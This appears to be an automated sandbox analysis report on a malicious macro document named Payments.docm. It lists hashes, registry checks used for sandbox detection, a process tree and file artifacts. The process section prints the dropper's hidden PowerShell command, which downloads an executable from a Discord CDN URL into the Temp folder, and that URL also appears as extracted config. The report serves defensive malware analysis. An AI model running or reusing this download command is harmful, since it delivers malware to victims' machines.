Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 04:15
Static task
static1
Behavioral task
behavioral1
Sample
Payments.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
Payments.docm
Resource
win10v2004-20220414-en
General
-
Target
Payments.docm
-
Size
83KB
-
MD5
27cb67322a39cf49a0560f784df67969
-
SHA1
0750c70072f37062a1079f14a1e4da0f78a5fdfe
-
SHA256
37c52ac76731fec0a321cae8cd5cf91597de3c90aed254f28fbcb4764e617e23
-
SHA512
4260a95093659d0beaf40c63a6bfbee4d63b5ec4a69760130cacef4c441c1ebe591111ed964b0ae3d6b508052bde145a8d6893dc1f2eea624bc7bbdecd5a3968
Malware Config
Extracted
http://cdn.discordapp.com/attachments/709738084001906749/709738177027637330/Purchase.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4776 2316 powershell.exe WINWORD.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 51 4776 powershell.exe 52 4776 powershell.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEWINWORD.EXEEXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
WINWORD.EXEEXCEL.EXEEXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2316 WINWORD.EXE 2316 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4776 powershell.exe 4776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4776 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 2316 WINWORD.EXE 2316 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 19 IoCs
Processes:
WINWORD.EXEEXCEL.EXEEXCEL.EXEpid process 2316 WINWORD.EXE 2316 WINWORD.EXE 2316 WINWORD.EXE 2316 WINWORD.EXE 4892 EXCEL.EXE 4892 EXCEL.EXE 4892 EXCEL.EXE 4892 EXCEL.EXE 5060 EXCEL.EXE 5060 EXCEL.EXE 5060 EXCEL.EXE 5060 EXCEL.EXE 2316 WINWORD.EXE 2316 WINWORD.EXE 2316 WINWORD.EXE 2316 WINWORD.EXE 2316 WINWORD.EXE 2316 WINWORD.EXE 2316 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 2316 wrote to memory of 4776 2316 WINWORD.EXE powershell.exe PID 2316 wrote to memory of 4776 2316 WINWORD.EXE powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payments.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cdn.discordapp.com/attachments/709738084001906749/709738177027637330/Purchase.exe',$env:Temp+'\Filename.exe')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECEFilesize
471B
MD5136ba521784a8ce47a3850452207b885
SHA1b654f686e5c96c5d4300bc81822c22c0928fe1cd
SHA2568fb5921945889e17a35d67a61a81a767323f57fe0edd07a1fa6dadbd62669117
SHA512619f1e14e419c77e511e27d55116b66a934ba550893a794d274a35c02d0d0e9a177eef2b7ec5f40a821a5c501bb000872822fd5a41d71d209a6dc23ed88e11bf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECEFilesize
416B
MD565539a1e5524c9396f239f30288aa17d
SHA14255ebceeec2694d3cac55f81fb459a7b9a6d9d2
SHA25683dd4fc25d1ec747c50a8a6d69b445f5591f581ec7c6d53aad8c9463705b7eec
SHA5127dfdf24fb32646281ce3d21bfc43df5dc7b32249f83f8eda89066808b2e297836211eb3a35496d80eab0752e155ad89706f8b21c064043c7c080eb11ec82841c
-
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1FD47DF7-23BC-4170-BBBC-3B4E81372E1BFilesize
145KB
MD508d0acfcabfa9194fd8bb689b77cffb7
SHA126ddb220abc6f141335674dfa67f8efceba1336e
SHA25616167c73fedbc0d6ea02014bde0ed64cee03afe2d8c7f64c8f784117f4bf8175
SHA51246aff8e53305c929b96dd4f386d48ef51ea643ceb8644696f18d5ac03f796c9a9e8bed72e2cb7e761266a61cfe401c413e3392aebbd7fba01bc18d740a3eaa94
-
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xmlFilesize
303KB
MD53775d965d0083409739f9e27918ec12a
SHA1409fa9f4fe3d3810d5181e1ad9c0ee8bb556df48
SHA25668f47c97290d8f5e8090c3552863ab12de0803f2da8c53cb0164cb18204f1031
SHA5121f2623f9da2c3dfdd6b372671a8260bd52eb19a2ec9dfc561d551a5a33076d8e5df3818f7fcc58ebe196181471f034d314b8de3b6cba67b8acad4e2f81a5d015
-
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xmlFilesize
303KB
MD53775d965d0083409739f9e27918ec12a
SHA1409fa9f4fe3d3810d5181e1ad9c0ee8bb556df48
SHA25668f47c97290d8f5e8090c3552863ab12de0803f2da8c53cb0164cb18204f1031
SHA5121f2623f9da2c3dfdd6b372671a8260bd52eb19a2ec9dfc561d551a5a33076d8e5df3818f7fcc58ebe196181471f034d314b8de3b6cba67b8acad4e2f81a5d015
-
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.dbFilesize
4KB
MD5f138a66469c10d5761c6cbb36f2163c3
SHA1eea136206474280549586923b7a4a3c6d5db1e25
SHA256c712d6c7a60f170a0c6c5ec768d962c58b1f59a2d417e98c7c528a037c427ab6
SHA5129d25f943b6137dd2981ee75d57baf3a9e0ee27eea2df19591d580f02ec8520d837b8e419a8b1eb7197614a3c6d8793c56ebc848c38295ada23c31273daa302d9
-
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-walFilesize
48KB
MD55bf5746e446ceb0485d08c04dd232a0b
SHA1bb4d945dc1e5520f87ef30e2e1d95ae15c39432a
SHA256d07214d18178f4c33693c779f03d936a4db74f5bca7c2c89298f7fdda4469eb6
SHA512b5c9fe61fc207c825bb536e925e921fa914c4c8eeab8a4e8db7f4d041aac2ba91ec8aa74fefe655f359317ea3e7d4f8c77ffe515e12c86881271cecb6a9670dc
-
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-walFilesize
48KB
MD55bf5746e446ceb0485d08c04dd232a0b
SHA1bb4d945dc1e5520f87ef30e2e1d95ae15c39432a
SHA256d07214d18178f4c33693c779f03d936a4db74f5bca7c2c89298f7fdda4469eb6
SHA512b5c9fe61fc207c825bb536e925e921fa914c4c8eeab8a4e8db7f4d041aac2ba91ec8aa74fefe655f359317ea3e7d4f8c77ffe515e12c86881271cecb6a9670dc
-
memory/2316-135-0x00007FF89A150000-0x00007FF89A160000-memory.dmpFilesize
64KB
-
memory/2316-133-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmpFilesize
64KB
-
memory/2316-131-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmpFilesize
64KB
-
memory/2316-132-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmpFilesize
64KB
-
memory/2316-136-0x00007FF89A150000-0x00007FF89A160000-memory.dmpFilesize
64KB
-
memory/2316-130-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmpFilesize
64KB
-
memory/2316-134-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmpFilesize
64KB
-
memory/4776-144-0x0000000000000000-mapping.dmp
-
memory/4776-156-0x00007FF8B1490000-0x00007FF8B1F51000-memory.dmpFilesize
10.8MB
-
memory/4776-154-0x00000181680A0000-0x00000181680C2000-memory.dmpFilesize
136KB
-
memory/4892-164-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmpFilesize
64KB
-
memory/4892-169-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmpFilesize
64KB
-
memory/4892-170-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmpFilesize
64KB
-
memory/5060-166-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmpFilesize
64KB